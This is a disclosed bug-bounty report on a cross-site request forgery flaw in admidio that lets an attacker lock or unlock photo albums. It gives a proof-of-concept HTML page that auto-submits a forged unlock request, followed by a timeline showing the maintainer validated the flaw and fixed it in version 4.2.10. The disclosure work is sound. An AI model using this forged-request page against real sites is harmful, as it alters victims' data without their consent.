We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Cross-Site Request Forgery lead to lock and unlock Album in admidio/admidio

Valid

Reported on

Jun 28th 2023

Description

Attacker able to lock or unlock any album with this CSRF attack.

Proof of Concept

  1. Admin already should be logged in browser
  2. Open the CSRF.html
<html>
    <body>
        <form action="http://localhost/adm_program/modules/photos/photo_album_function.php">
            <input type="hidden" name="photo_uuid" value="b9131a9d-577e-4f06-b87e-5af30714b25b" />
            <input type="hidden" name="mode" value="unlock" />
            <input type="submit" value="Submit request" />
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>

The album b9131a9d-577e-4f06-b87e-5af30714b25b will be unlock

Acknowledge

Tran Van Nhan from bl4ckh0l3 of GalaxyOne

Impact

The attacker could potentially gain access to sensitive information if the photo album contains images with sensitive data.

We are processing your report and will contact the admidio team within 24 hours. 3 months ago
Tran Van Nhan modified the report
3 months ago
We have contacted a member of the admidio team and are waiting to hear back 3 months ago
Markus Faßbender validated this vulnerability 2 months ago
Tran Van Nhan has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Markus Faßbender marked this as fixed in 4.2.10 with commit ba3099 2 months ago
Markus Faßbender has been awarded the fix bounty
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on Jul 16th 2023
Tran Van Nhan
2 months ago

Researcher

Hi @maintainer. Could you assign a CVE identifier for this vulnerability?

Markus Faßbender published this vulnerability 2 months ago
to join this conversation